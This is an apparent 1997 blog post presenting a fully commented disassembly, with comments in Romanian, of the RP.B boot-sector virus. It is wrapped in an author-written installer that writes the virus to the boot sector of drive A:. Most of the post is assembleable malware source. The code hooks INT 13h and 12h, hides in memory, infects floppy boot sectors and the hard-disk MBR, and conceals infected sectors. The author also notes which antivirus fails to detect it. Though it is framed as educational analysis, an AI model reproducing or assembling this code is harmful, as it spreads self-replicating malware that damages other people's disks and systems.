Dissasembling a computer virus

Today my computer almost got virused. A friend brought a diskette to my house and I rebooted my computer with the disk still in…

Intrigued by this event, I wanted to see what’s on the boot sector of that diskette… so I dumped the boot sector in a file and start to disassemble the file.

To my surprise, it was a romanian virus (based on the text messages contained inside).

For educational purposes, I commented out the code of entire virus, as well as the effects of this virus… I even created an ‘installer’ like application. Let’s be clear: the installer is mine… the virus provenience is unknown.

I commented out the virus in romanian since this will be used in an educational paper that I plan to publish.

To assemble the code you need to:

The result of running these commands will be a .COM file. If you run it it will ask if you want to install the virus in the boot sector of disk A:.

; ===================================================
; = RP.B este un virus romanesc           =
; = prins, dezasamblat si commentat         =
; = de VMA soft in 1997 pentru scopuri educationale =
; ===================================================

; RP.B este un virus romanesc care isi face aparitia vizuala in luna Mai.
; Daca luna curenta este mai el afiseaza in bucla infinita urmatorul
; mesaj : "Only bugs exist! RP 1995 Bucharest" neproducand infectii.
; Daca nu este luna mai atunci el infecteaza sectoarele de boot ale disktelor
; si tabela de partitii a harddiskului.
; Sectoarul original cu tabela de partitii este copiat pe sectorul fizic 14,
; fata 0, cilindrul 0 la hardiskuri sau pe sectorul fizic 14, fata 1, cil. 0
; la diskete cu MediaByte=0F0h sau pe sectorul 3 la diskete cu MediaByte<>0F0h
; In mod normal la hardisk acest sector este nefolosit iar la disketele ce au
; MediaByte=0F0h acest sector reprezinta sectorul logic 31, adica penultimul
; sector din ROOT (de obicei ROOT-ul are 14 sectoare).
; Virusul se autocopiaza in ultimul KByte de RAM raportat de BIOS si instaleaza
; rutine noi pentru tratarea intreruperilor 13h si 12h.
; Se foloseste un contor care memoreaza de cate ori a fost accesata INT 13H
; in alte scopuri decat pentru a citi MBR-ul sau BOOT-ul. Daca acest contor
; ajunge la 90 atunci INT 12H va returna 640K de memorie. Contorul devine 0
; daca se acceseaza MBR-ul sau BOOT-ul unei dischete.
; OBS: Acest program de instalare a virusului pe disketa nu copiaza sec0 in
; sec31, de aceea la boot-area de pe aceasta disketa veti primi probabil un
; mesaj de eroare din partea BIOS-ului. Urmatoarele diskete ce se vor accesa
; cat si harddiskul vor beneficia de o virusare 'corecta'.
;
; OBS: Acest virus nu este recunoscut de TBAV 7.07 dar este recunoscut de F-PROT 2.24c


.model tiny
.code
org 100h
entry:

; =================================================
; Partea asta copiaza sectorul de BOOT pe discul A:
; In felul acesta se instaleaza virusul RP in BOOT
; =================================================

      lea   si, mes1
      call  AfisTxt  ; se afiseaza mesajul introductiv

get_y_n:
      mov   ah,8    ; verifica daca se doreste instalarea virusului
      int   21h
      cmp   al,'D'
      jz   yes
      cmp   al,'d'
      jz   yes
      cmp   al,'N'
      jz   no
      cmp   al,'n'
      jz   no
      jmp   get_y_n

yes:    xor   al,al   ; al = 0 - Discul A:
      mov   cx,1    ; cx = 1 - Numarul de sectoare de scris
      xor   dx,dx   ; dx = 0 - Sectorul de BOOT
      push  ds
      lea   bx,RPVirus
      int   26h    ; scrie 512 bytes de la adresa ds:[bx]
      pop   ax     ; scot byte-ul ramas aiurea pe stiva
      pop   ds
      jc   _Cont1
      lea   si, mes2
      call  AfisTxt
      xor   al,al      ; Se returneaza 0 pentru instalare normala
      jmp   short _Cont2
_Cont1:   lea   si, mes3
      call  AfisTxt
      mov   al,1       ; Se returneaza 1 pentru eroare la scriere pe discul A:
_Cont2:   mov   ah,4Ch
      int   21h

No:     lea   si, mes4
      call  AfisTxt
      mov   al,2       ; Se returneaza 2 pentru program intrerupt de utilizator
      jmp   short _Cont2

mes1:    db 'VMA RPVirus Installer . Versiunea 1.0 (c) VMA software', 0Ah, 0Dh
      db 'Doriti sa instalati virusul in sectorul de BOOT A: (D/N) ?',0Ah, 0Dh, 0
mes2:    db 'Sectorul de BOOT de pe discul A: a fost inlocuit cu succes.', 0Ah, 0Dh,0
mes3:    db 'Eroare la scriere pe discul A:', 0Ah, 0Dh,0
mes4:    db 'Program intrerupt de utilizator! Virusul nu s-a instalat !', 0Ah, 0Dh,0

; =========================        ; afiseaza sirul ASCIIZ de la
;  Subrutina pentru afisat         ; adresa ds:[si]
; =========================

AfisTxt   proc  near
      cld
Next1:
      lodsb              ; String ds:[si] -> al
      or   al,al          ; Zero ?
      jnz   Next2          ; Jump daca nu
      retn
Next2:
      push  si
      mov   ah,0Eh
      int   10h
      pop   si

      jmp   short Next1
AfisTxt   endp


; ===================================
; Aici incepe codul pentru virusul RP
; ===================================

RPVirus   proc  near
FixPoint   equ   7C00h
ProgBegin  equ   $
NewInt13hHan equ   FixPoint+(offset NewInt13h)-ProgBegin
NewInt12hHan equ   FixPoint+(offset NewInt12h)-ProgBegin
Old13hVec  equ   FixPoint+(offset Old13h)-ProgBegin
Old12hVec  equ   FixPoint+(offset Old12h)-ProgBegin
BOOTHdr   equ   Fixpoint+(offset hdr)-ProgBegin
MBRecord   equ   FixPoint+(offset mesaj1)-ProgBegin
ContorNoRead equ   FixPoint+(offset Contor)-ProgBegin
MesajLunaMai equ   FixPoint+(offset mesajmai)-ProgBegin

      jmp   short start
      nop

Hdr:    db 'MSDOS5.0'   ; 8 bytes - Numele si versiune SO
      dw 512       ; Dimensiunea sectorului in octeti
      db 1        ; Numarul de sectoare/cluster
      dw 1        ; Sectoare ocupate pana la prima copie FAT
      db 2        ; Numarul de copii FAT
      dw 224       ; Numarul intrarilor in directorul radacina : 224*32/512=14 sectoare ocupate de ROOT
      dw 2880      ; Numarul total de sectoare ale discului : (2880*512-1457664)/512=33 sectoare rezervate
      db 0F0h      ; Tipul discului identic cu primul byte din FAT (MediaByte)
      dw 9        ; Numarul de sectoare/copie FAT
      dw 18       ; Numarul de sectoare/pista
      dw 2        ; Numarul de fete (capete de citire/scriere)
      dd 0        ; Numarul de sectoare din fata sectorului de BOOT : pt. discheta este 0
      dd 0        ; Nefolosit ( Big total number of sectors )
      dw 0        ; Numarul discului fizic
      db 29h       ; Extended boot sector signature
      db 02h,1Fh,61h,1Dh ; Numarul serial al dischetei
      db 'PCT9U_03-05'  ; 11 bytes - Eticheta dischetei ( Volume label )
      db 'FAT12  '   ; 8 bytes - Identificator pentru tipul de fisiere

      db 0FAh
Contor:   db 00h
Old13h:   db 54h, 0A2h, 00h, 0F0h
Old12h:   db 41h, 0F8h, 00h, 0F0h

Start:   push  cs
      pop   ds
      mov   ah,4
      int   1Ah           ; obtine in DH luna curenta

      cmp   dh,5
      jne   Nu_e_MAI
      jmp   LunaMai         ; daca este luna MAI sare la LunaMai
Nu_e_MAI:
      mov   bx,13h*04h       ; memoreaza la Old13h vectorul INT 13h
      mov   ax,[bx]
      mov   cs:Old13hVec,ax
      mov   bx,13h*04h+2
      mov   ax,[bx]
      mov   word ptr cs:Old13hVec+2,ax

      mov   bx,12h*04h       ; memoreaza la Old12h vectorul INT 12h
      mov   ax,[bx]
      mov   cs:Old12hVec ,ax
      mov   bx,12h*04h+2
      mov   ax,[bx]
      mov   word ptr cs:Old12hVec+2,ax

      mov   bh,04h
      mov   bl,13h         ; BX = 0413h (Memory size in KBytes)
      mov   ax,[bx]
      dec   ax
      mov   [bx],ax         ; Scade 1K din memoria raportata de BIOS la adr 413h
      mov   cl,6          ; Calculeaza in AX segmentul corespunzator
      shl   ax,cl          ; ultimului K de memorie in care se va copia
      sub   ax,7C0h         ; virusul
      push  ax

      mov   bx,13h*04h+2
      mov   [bx],ax
      mov   bx,12h*04h+2
      mov   [bx],ax
      mov   bx,13h*04h
      mov   ax,NewInt13hHan     ; Seteaza vectorul INT 13h spre NewInt13h
      mov   [bx],ax
      mov   bx,12h*04h
      mov   ax,NewInt12hHan     ; Seteaza vectorul INT 12h spre NewInt12h
      mov   [bx],ax

      pop   ax           ; AX = segmentul corespunzator ultimului KByte
      mov   si,FixPoint
      mov   di,si
      mov   es,ax
      mov   cx,512/2
      cld               ; Copiaza virusul de la adresa 0:7C00h
      rep   movsw          ; in ultimul KByte de memori

      int   19h           ; Incarca sistemul

NewInt13h: cmp   ah,2          ; AH=2 Functia de citire sectoare
      jne   NoBOOTRead       ; Verifica daca se citeste MasterBOOT-ul sau BOOT-ul la diskete
      cmp   cx,1          ; sau sectorul de BOOT la dischete
      jne   NoBOOTRead       ; Petru citire trebuie:
      cmp   dh,0          ; AX = 0201h ; CX = 1 ; DH = 00h
      jne   NoBOOTRead       ; DL = 80h => HardDisk ; DL = 0 => FloppyDisk
      mov   byte ptr cs:ContorNoRead ,0 ; Daca se citeste sectorul respectiv atunci Contor=0
      pushf
      call  dword ptr cs:Old13hVec ; Se apeleaza vechea rutina pt INT 13h
      jc   loc_ret_7        ; JMP loc_ret_7 daca eroare la citire
      cmp   word ptr es:[bx][offset VirusFlag-progbegin],0303h ; Verifica daca sectorul citit este deja infectat
      je   loc_6          ; Daca DA atunci citeste sectorul original pe care l-a salvat in alta parte (vezi Calcul)
      call  sub_1          ; Daca NU atunci copiaza sectorul original in alta parte (vezi Calcul)
      jnc   loc_3
      clc
      retf  2            ; Daca eroare la scriere atunci se revine din intrerupere
loc_3:
      push  ds
      push  es
      pop   ds           ; DS=ES
      push  cs
      pop   es           ; ES=CS
      mov   si,bx
      add   si,1BEh
      mov   di,MBRecord
      mov   cx,66/2         ; Copiaza 66 de bytes de la offsetul 1BEh relativ la sectorul citit
      cld               ; in zona cu Mesaj1. (cei 66 de bytes reprezinta Master Boot Record daca este HardDisk)
      rep   movsw
      mov   si,bx
      add   si,3
      mov   di,BOOTHdr
      mov   cx,60/2         ; Copiaza 60 de bytes de la offsetul 3 relativ la sectorul citit
      cld               ; in zona cu Hdr. (cei 60 de bytes reprezinta datele din BOOT daca este disketa)
      rep   movsw
      pop   ds
      mov   ax,0301h        ; Se scrie pe disc in sectorul 1
      mov   cx,1          ; zona de memorie ce contine virusul
      mov   bx,FixPoint
      xor   dh,dh          ; DH=0 -> Partition Table sau BOOT Dischete
      pushf
      call  dword ptr cs:Old13hVec 
      retf  2

NoBOOTRead:
      cmp   byte ptr cs:ContorNoRead ,90
      je   loc_5
      inc   byte ptr cs:ContorNoRead 
loc_5:
      jmp   dword ptr cs:Old13hVec 


sub_1    proc  near          ; Copiaza sectorul original care nu este infectat
      call  Calcul         ; la noua pozitie returnata de Calcul
      mov   ax,301h
      pushf
      call  dword ptr cs:Old13hVec 
      retn
sub_1    endp

loc_6:   call  Calcul         ; Daca sectorul citit (MB sau BOOT) este deja infectat atunci
      mov   ax,0201h        ; se citeste sectorul 14 in loc de MB pt HardDisk-uri sau
      pushf             ; se citeste sectorul 14 sau 3 in loc de BOOT pt dischete
      call  dword ptr cs:Old13hVec 
loc_ret_7: retf  2


Calcul   proc  near          ; Subrutina CALCUL returneaza:
      mov   cl,14          ; CL=14    daca MB HardDisk (DL>=80h)
      cmp   dl,80h         ; CL=14 & DH=1 daca Discketa cu MediaByte=0F0h
      jae   CalculRet        ; CL=3 & DH=1 daca Discketa cu MediaByte<>0F0h
      mov   dh,1
      mov   al,es:[bx+15h]     ; ES:[BX+15h]=MediaByte
      cmp   al,0F0h
      je   CalculRet
      mov   cl,3
CalculRet: retn
Calcul   endp


NewInt12h: cmp   byte ptr cs:ContorNoRead ,90
      jne   cont1
      mov   ax,640
      iret
Cont1:   jmp   dword ptr cs:Old12hVec 


MesajMai:  ;    Aici este urmatorul (MESAJ) XOR 240
      ;    db 'Only bugs exist! ',10h
      ;    db 'RP 1995 Bucharest',0D4h
      db   0BFh, 9Eh, 9Ch, 89h, 0D0h, 92h, 85h, 97h, 83h
      db   0D0h, 95h, 88h, 99h, 83h, 84h, 0D1h, 0D0h, 0EAh
      db   0A2h, 0A0h, 0D0h, 0C1h, 0C9h, 0C9h, 0C5h, 0D0h, 0B2h
      db   85h, 93h, 98h, 91h, 82h, 95h, 83h, 84h, '$'

LunaMai:  xor   ax,ax          ; Seteaza modul video 0
      int   10h

      mov   si,MesajLunaMai
      mov   bx,000Ah        ; BH=0 -> pagina 0 ; BL=10 -> culoarea
      mov   cx,1          ; De cate ori afiseaza caracterul
      mov   dx,0A01h
Cont2:
      mov   ah,2
      inc   dl           ; Coordonatele cursorului: DH=10;DL=2
      int   10h           ; Pozitioneaza cursorul la (L=10,C=2)

      mov   ah,9          ; Functia de scriere caracter si atribut la cursor
      lodsb              ; Preia cate un caracter din MesajMai
      cmp   al,'$'
      je   Cont3
      xor   al,240         ; Decodifica : CARACTER XOR 240
      int   10h           ; Afiseaza caracter
      jmp   short Cont2

Cont3:   mov   cx,0FFFFh
Delay:   loop  Delay          ; Produce un Delay
      jmp   short LunaMai      ; Intra in bucla infinita: <Setare mod 0; Afisare Txt; Delay>

VirusFlag: db   03h, 03h        ; Semnatura virusului in sector
Mesaj1:   db   0Ah,'Replace and press any key when ready', 0Dh, 0Ah, 0
      db   'IO   SYS'
      db   'MSDOS  SYS'

progend   equ   $
      db   00h,000h
      db   55h,0AAh        ; Semnatura pentru sector MB sau BOOT

      RPVirus endp

      end   entry

01 Mar 1997